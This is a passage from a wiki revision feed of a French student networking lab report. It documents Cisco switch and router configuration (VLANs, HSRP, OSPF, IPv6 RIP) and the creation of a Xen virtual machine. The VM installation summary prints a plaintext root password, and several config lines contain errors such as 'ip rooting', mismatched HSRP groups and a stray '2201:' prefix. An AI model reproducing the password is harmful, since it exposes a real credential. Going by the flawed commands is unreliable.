    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51314</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51314"/>
				<updated>2019-11-28T11:49:27Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Création du lien pour la borne wifi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
